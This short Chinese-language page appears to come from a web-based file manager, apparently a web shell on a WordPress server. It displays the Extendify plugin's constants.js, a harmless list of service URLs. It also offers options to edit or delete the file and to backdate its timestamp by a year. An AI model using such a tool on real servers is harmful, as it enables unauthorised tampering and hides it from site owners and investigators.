文件操作 - constants.js
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/extendify/src/constants.js
编辑文件内容
// The linter plugin expects const DEFAULT_URLS to be defined here to ensure no localhost const DEFAULT_URLS = { AI_HOST: 'https://ai.extendify.com', PATTERNS_HOST: 'https://patterns.extendify.com', KB_HOST: 'https://kb.extendify.com', INSIGHTS_HOST: 'https://insights.extendify.com', IMAGES_HOST: 'https://images-resource.extendify.com', DASHBOARD_HOST: 'https://dashboard.extendify.com', }; export const { AI_HOST, PATTERNS_HOST, KB_HOST, INSIGHTS_HOST, IMAGES_HOST } = DEFAULT_URLS;
修改文件时间
将文件时间修改为当前时间的前一年
删除文件